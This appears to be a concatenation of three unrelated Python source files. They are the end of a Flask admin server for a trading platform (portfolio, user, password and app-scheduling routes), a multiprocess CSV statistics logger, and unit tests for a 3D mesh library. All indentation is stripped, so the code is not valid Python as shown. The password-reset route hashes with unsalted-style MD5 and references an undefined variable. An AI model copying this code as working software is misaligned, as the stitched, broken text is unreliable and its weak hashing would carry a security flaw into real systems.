if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"rounds": self.__data_mgr__.get_rounds(gid, sid)
}
return pack_rsp(ret)
# 查询策略持仓
@app.route("/mgr/qrypos", methods=["POST"])
def qry_positions():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"positions": self.__data_mgr__.get_positions(gid, sid)
}
return pack_rsp(ret)
# 查询策略持仓
@app.route("/mgr/qryfunds", methods=["POST"])
def qry_funds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"funds": self.__data_mgr__.get_funds(gid, sid)
}
return pack_rsp(ret)
# 查询通道订单
@app.route("/mgr/qrychnlords", methods=["POST"])
def qry_channel_orders():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"orders": self.__data_mgr__.get_channel_orders(gid, cid)
}
return pack_rsp(ret)
# 查询通道成交
@app.route("/mgr/qrychnltrds", methods=["POST"])
def qry_channel_trades():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"trades": self.__data_mgr__.get_channel_trades(gid, cid)
}
return pack_rsp(ret)
# 查询通道持仓
@app.route("/mgr/qrychnlpos", methods=["POST"])
def qry_channel_position():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"positions": self.__data_mgr__.get_channel_positions(gid, cid)
}
return pack_rsp(ret)
# 查询通道资金
@app.route("/mgr/qrychnlfund", methods=["POST"])
def qry_channel_funds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
cid = get_param(json_data, "channelid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"funds": self.__data_mgr__.get_channel_funds(gid, cid)
}
return pack_rsp(ret)
# 查询用户列表
@app.route("/mgr/qryusers", methods=["POST"])
def qry_users():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
users = self.__data_mgr__.get_users()
for usrInfo in users:
usrInfo.pop("passwd")
ret = {
"result":0,
"message":"",
"users": users
}
return pack_rsp(ret)
# 提交用户信息
@app.route("/mgr/cmtuser", methods=["POST"])
def cmd_commit_user():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
self.__data_mgr__.add_user(json_data, adminInfo["loginid"])
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "cmtuser", json.dumps(json_data))
return pack_rsp(ret)
# 删除用户
@app.route("/mgr/deluser", methods=["POST"])
def cmd_delete_user():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
loginid = get_param(json_data, "loginid")
if self.__data_mgr__.del_user(loginid, adminInfo["loginid"]):
self.__data_mgr__.log_action(adminInfo, "delusr", loginid)
ret = {
"result":0,
"message":"Ok"
}
return pack_rsp(ret)
# 修改密码
@app.route("/mgr/resetpwd", methods=["POST"])
def reset_pwd():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
user = get_param(json_data, "loginid")
pwd = get_param(json_data, "passwd")
if len(pwd) == 0 or len(user) == 0:
ret = {
"result":-1,
"message":"密码都不能为空"
}
else:
encpwd = hashlib.md5((user+pwd).encode("utf-8")).hexdigest()
usrInf = self.__data_mgr__.get_user(user)
if usrInf is None:
ret = {
"result":-1,
"message":"用户不存在"
}
else:
self.__data_mgr__.mod_user_pwd(user, encpwd, adminInfo["loginid"])
self.__data_mgr__.log_action(adminInfo, "resetpwd", loginid)
ret = {
"result":0,
"message":"Ok"
}
return pack_rsp(ret)
# 查询操作记录
@app.route("/mgr/qryacts", methods=["POST"])
def qry_actions():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
sdate = get_param(json_data, "sdate")
edate = get_param(json_data, "edate")
ret = {
"result":0,
"message":"",
"actions": self.__data_mgr__.get_actions(sdate, edate)
}
return pack_rsp(ret)
# 查询全部调度
@app.route("/mgr/qrymons", methods=["POST"])
def qry_mon_apps():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
schedules = self._dog.get_apps()
for appid in schedules:
schedules[appid]["group"] = self.__data_mgr__.has_group(appid)
ret = {
"result":0,
"message":"",
"schedules": schedules
}
return pack_rsp(ret)
@app.route("/mgr/startapp", methods=["POST"])
def cmd_start_app():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
appid = get_param(json_data, "appid")
if not self._dog.has_app(appid):
ret = {
"result":-1,
"message":"App不存在"
}
else:
if not self._dog.isRunning(appid):
self._dog.start(appid)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "startapp", appid)
return pack_rsp(ret)
# 组合停止
@app.route("/mgr/stopapp", methods=["POST"])
def cmd_stop_app():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
appid = get_param(json_data, "appid")
if not self._dog.has_app(appid):
ret = {
"result":-1,
"message":"App不存在"
}
else:
if self._dog.isRunning(appid):
self._dog.stop(appid)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "stopapp", appid)
return pack_rsp(ret)
# 查询调度日志
@app.route("/mgr/qrymonlog", methods=["POST"])
def qry_mon_logs():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
filename = os.getcwd() + "/logs/WtMonSvr.log"
content,lines = get_tail(filename, 100, "UTF-8")
ret = {
"result":0,
"message":"Ok",
"content":content,
"lines":lines
}
return pack_rsp(ret)
# 删除调度任务
@app.route("/mgr/delapp", methods=["POST"])
def cmd_del_app():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
id = get_param(json_data, "appid")
if len(id) == 0:
ret = {
"result":-1,
"message":"组合ID不能为空"
}
elif self.__data_mgr__.has_group(id):
ret = {
"result":-2,
"message":"该调度任务是策略组合,请从组合管理删除"
}
elif not self._dog.has_app(id):
ret = {
"result":-3,
"message":"该调度任务不存在"
}
elif self._dog.isRunning(id):
ret = {
"result":-4,
"message":"请先停止该任务"
}
else:
if True:
self._dog.delApp(id)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "delapp", id)
else:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询组合持仓
@app.route("/mgr/qryportpos", methods=["POST"])
def qry_group_positions():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"positions": self.__data_mgr__.get_group_positions(gid)
}
return pack_rsp(ret)
# 查询组合成交
@app.route("/mgr/qryporttrd", methods=["POST"])
def qry_group_trades():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"trades": self.__data_mgr__.get_group_trades(gid)
}
return pack_rsp(ret)
# 查询组合回合
@app.route("/mgr/qryportrnd", methods=["POST"])
def qry_group_rounds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"rounds": self.__data_mgr__.get_group_rounds(gid)
}
return pack_rsp(ret)
# 查询组合资金
@app.route("/mgr/qryportfunds", methods=["POST"])
def qry_group_funds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"funds": self.__data_mgr__.get_group_funds(gid)
}
return pack_rsp(ret)
# 查询组合绩效分析
@app.route("/mgr/qryportperfs", methods=["POST"])
def qry_group_perfs():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"performance": self.__data_mgr__.get_group_performances(gid)
}
return pack_rsp(ret)
# 查询组合过滤器
@app.route("/mgr/qryportfilters", methods=["POST"])
def qry_group_filters():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"filters": self.__data_mgr__.get_group_filters(gid)
}
return pack_rsp(ret)
# 提交组合过滤器
@app.route("/mgr/cmtgrpfilters", methods=["POST"])
def cmd_commit_group_filters():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
filters = get_param(json_data, "filters", type=dict)
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
try:
self.__data_mgr__.set_group_filters(grpid, filters)
ret = {
"result":0,
"message":"Ok"
}
except:
ret = {
"result":-1,
"message":"过滤器保存失败"
}
return pack_rsp(ret)
def __run_impl__(self, port:int, host:str):
self._dog.run()
self.push_svr.run(port = port, host = host)
def run(self, port:int = 8080, host="0.0.0.0", bSync:bool = True):
if bSync:
self.__run_impl__(port, host)
else:
import threading
self.worker = threading.Thread(target=self.__run_impl__, args=(port,host,))
self.worker.setDaemon(True)
self.worker.start()
def init_logging(self):
pass
def on_start(self, grpid:str):
if self.__data_mgr__.has_group(grpid):
self.push_svr.notifyGrpEvt(grpid, 'start')
def on_stop(self, grpid:str, isErr:bool):
if self.__data_mgr__.has_group(grpid):
self.push_svr.notifyGrpEvt(grpid, 'stop')
# 如果是错误,要通知管理员
if isErr and self._sink_:
grpInfo = self.__data_mgr__.get_group(grpid)
self._sink_.notify("fatal", "检测到 %s[%s] 意外停止, 请及时处理!!!"%(grpInfo["name"], grpid))
def on_output(self, grpid:str, tag:str, time:int, message:str):
if self.__data_mgr__.has_group(grpid):
self.push_svr.notifyGrpLog(grpid, tag, time, message)
def on_order(self, grpid:str, chnl:str, ordInfo:dict):
self.push_svr.notifyGrpChnlEvt(grpid, chnl, 'order', ordInfo)
def on_trade(self, grpid:str, chnl:str, trdInfo:dict):
self.push_svr.notifyGrpChnlEvt(grpid, chnl, 'trade', trdInfo)
def on_notify(self, grpid:str, chnl:str, message:str):
self.push_svr.notifyGrpChnlEvt(grpid, chnl, 'notify', message) |
stats.py | """
Simple and lightweight statistics collection module.
Logging is done in a separate process to minimize influence of logging on program execution.
"""
from multiprocessing import Process, Queue
from queue import Empty
import csv
from enum import Enum
import datetime
import logging
import time
import sys
import os
# target sleep time in between counter measurements in ms
TARGET_SLEEP_TIME = 1000
class Stats:
"""
Class for statistics collection.
"""
class MessageType(Enum):
"""
Message types used for multiprocess communication.
"""
STOP = 0
NEW_LOGGER = 1
NEW_COUNTER = 2
NEW_AVERAGER = 3
NEW_LOGGER_VAL = 4
NEW_COUNTER_VAL = 5
NEW_AVERAGER_VAL = 6
SUBFOLDER = 7
STARTTIME = 8
class Message():
"""
Messages sent to logger thread of stats.
"""
def __init__(self, typ, name='', value=0, timestamp=0):
self.type = typ
self.name = name
self.value = value
self.timestamp = timestamp
def get_type(self):
"""
Type of the logger.
"""
return self.type
def get_name(self):
"""
Name of the logger
"""
return self.name
def get_value(self):
"""
Value of the logger
"""
return self.value
def get_timestamp(self):
"""
Timestamp of the measured value.
"""
return self.timestamp
class StatisticsThread():
"""
Prints and writes statistics collected asynchrously.
"""
def __init__(self, queue, stats, subfolder):
self.queue = queue
self.stats = stats
self.loggers = {}
self.counters = {}
self.averagers = {}
self.subfolder = subfolder
self.starttime = ''
self.process = Process(target=self.run, args=(self.queue, self.stats, self.subfolder))
self.process.start()
def print_averagers(self):
"""
Write the value of every averager registered to a .csv file.
"""
path = self.subfolder + '/' + self.starttime + '_averagers.csv'
if not os.path.exists(path):
return
if list(self.averagers.keys()):
lst = [int(time.monotonic()*1000)]
for avg in list(self.averagers.keys()):
lst.append(self.averagers[avg])
with open(path, 'a+', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csvwriter.writerow(lst)
def print_counters(self):
"""
Write the value of every counter registered to a .csv file.
"""
path = self.subfolder + '/' + self.starttime + '_counters.csv'
if not os.path.exists(path):
return
if list(self.counters.keys()):
lst = [int(time.monotonic()*1000)]
for cnt in list(self.counters.keys()):
lst.append(self.counters[cnt])
with open(path, 'a+', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csvwriter.writerow(lst)
def print_loggers(self):
"""
Print the current value of all averagers registered.
"""
if list(self.loggers.keys()):
for logger in list(self.loggers.keys()):
path = self.subfolder + '/' + self.starttime + "_" + logger + '.csv'
if not os.path.exists(path):
continue
with open(path, 'a', newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for date in self.loggers[logger]:
csvwriter.writerow(date)
self.loggers[logger] = []
def write(self):
"""
Log all the collected data to csv files.
"""
self.print_averagers()
self.print_counters()
self.print_loggers()
def create_header(self, tname, line):
"""
Create a header for the csv files.
"""
try:
os.makedirs(self.subfolder, exist_ok=True)
fil = open(tname, 'w')
fil.write(line)
fil.close()
except:
logging.error(tname + ' could not be created')
def run(self, queue, stats, subfolder):
"""
Message processing of logger.
"""
self.starttime = str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%H%M%S'))
self.subfolder = subfolder
tmstp = time.monotonic() * 1000 + TARGET_SLEEP_TIME
while True:
try:
if tmstp < (time.monotonic() * 1000):
self.write()
tmstp = tmstp + 1000
msg = queue.get_nowait()
if msg.get_type() == stats.MessageType.STOP:
break
elif msg.get_type() == stats.MessageType.SUBFOLDER:
self.subfolder = msg.get_name()
elif msg.get_type() == stats.MessageType.STARTTIME:
pass
elif msg.get_type() == stats.MessageType.NEW_LOGGER:
self.loggers[msg.get_name()] = []
path = self.subfolder + '/' + self.starttime + "_" + msg.get_name() + '.csv'
self.create_header(path, "'timestamp';'value'\n")
elif msg.get_type() == stats.MessageType.NEW_COUNTER:
self.counters[msg.get_name()] = 0
path = self.subfolder + '/' + self.starttime + '_counters.csv'
self.create_header(path,
'\'' + '\';\''.join(['timestamp'] + list(self.counters.keys())) + '\'\n')
elif msg.get_type() == stats.MessageType.NEW_AVERAGER:
self.create_header(self.subfolder + '/' + self.starttime + '_averagers.csv',
'\'' + '\';\''.join(['timestamp'] + list(self.averagers.keys()) + msg.get_name()) + '\'\n')
self.averagers[msg.get_name()] = 0
elif msg.get_type() == stats.MessageType.NEW_LOGGER_VAL:
self.loggers[msg.get_name()].append([msg.get_timestamp(), msg.get_value()])
elif msg.get_type() == stats.MessageType.NEW_COUNTER_VAL:
self.counters[msg.get_name()] = msg.get_value()
elif msg.get_type() == stats.MessageType.NEW_AVERAGER_VAL:
self.averagers[msg.get_name()] = msg.get_value()
except Empty:
pass
except (KeyboardInterrupt, SystemExit):
logging.info('Received keyboard interrupt, writing files to disk.')
break
except:
logging.info('Some other error')
break
self.write()
logging.info('Files written to disk.')
def stop_logging(self, stats):
"""
Stop recording of logs and close thread.
"""
self.queue.put_nowait(stats.Message(stats.MessageType.STOP))
logging.info("Trying to stop logging thread/process.")
self.process.join()
self.queue.close()
self.queue.join_thread()
logging.info("Process joined.")
sys.exit(0)
def __init__(self, subfolder='.'):
self.queue = Queue()
self.statistics_thread = self.StatisticsThread(self.queue, self, subfolder)
class Counter():
"""
Simple incremental counter.
"""
def __init__(self, name, queue, stats):
self.name = name
self.value = 0
self.queue = queue
self.stats = stats
self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_COUNTER, name=self.name))
def inc(self, increase_by=1):
"""
Increment counter.
"""
self.value += increase_by
self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_COUNTER_VAL, name=self.name, value=self.value))
class Averager():
"""
Average added values.
"""
def __init__(self, name, queue, stats, weight=.2):
self.name = name
self.weight = weight
self.val = 0
self.queue = queue
self.stats = stats
self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_AVERAGER, name=self.name))
def add_value(self, value):
"""
Add current value and recalculate new average value.
"""
self.val = value * self.weight + (1.0-self.weight) * self.val
self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_AVERAGER_VAL, name=self.name, value=self.val))
class TimestampLogger():
"""
Log values with a timestamp.
"""
def __init__(self, name, queue, stats):
self.name = name
self.queue = queue
self.stats = stats
self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_LOGGER, name=self.name))
def timestamp(self, timestamp=-1, value=0):
"""
Add new measurement value and timestamp.
"""
if timestamp == -1:
timestamp = int(time.monotonic() * 1000)
self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_LOGGER_VAL,
name=self.name, value=value,
timestamp=timestamp))
def new_averager(self, name):
"""
Create a new averager class.
"""
avg = self.Averager(name, self.queue, self)
return avg
def new_counter(self, name):
"""
Create a new counter class.
"""
cnt = self.Counter(name, self.queue, self)
return cnt
def new_logger(self, name):
"""
Create a new timestamped logger.
"""
tsl = self.TimestampLogger(name, self.queue, self)
return tsl
def stop_logging(self):
"""
Stop the logger and kill logging thread.
"""
self.statistics_thread.stop_logging(self)
|
PrimitiveTest.py | ##########################################################################
#
# Copyright (c) 2008-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import time
import threading
import imath
import IECore
import IECoreScene
class PrimitiveTest( unittest.TestCase ) :
def test( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
self.assertEqual( m.inferInterpolation( 1 ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( 2 ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
self.assertEqual( m.inferInterpolation( 4 ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
self.assertEqual( m.inferInterpolation( 6 ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
self.assertEqual( m.inferInterpolation( 0 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
self.assertEqual( m.inferInterpolation( 10 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
self.assertEqual( m.inferInterpolation( IECore.FloatData( 1 ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( IECore.V3fVectorData( [ imath.V3f( 1 ) ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( IECore.FloatVectorData( [ 2, 3 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6, 7 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
def testCopyFrom( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
m2 = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 3, 2, 1 ] ) )
m2["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) )
self.assertNotEqual( m, m2 )
m2.copyFrom( m )
self.assertEqual( m, m2 )
def testLoad( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
self.assertTrue( m.arePrimitiveVariablesValid() )
IECore.Writer.create( m, "/tmp/testPrimitiveLoad.cob" ).write()
m2 = IECore.Reader.create( "/tmp/testPrimitiveLoad.cob" ).read()
self.assertTrue( m2.arePrimitiveVariablesValid() )
self.assertEqual( m, m2 )
def testHash( self ) :
hashes = []
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
hashes.append( m.hash() )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["a"].data[0] = 2
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"].indices[0] = 1
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
def testPrimitiveVariableDataValidity( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
# only vector data
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ) ) ) )
# constant can be anything
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) ) ) )
# data size matches interpolation
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3, 4 ] ) ) ) )
# data size (not base size) matches interpolation
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3) ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) ) ) )
def testPrimitiveVariableIndicesValidity( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
# only vector data
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
# constant needs to be vector data if there are indices
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
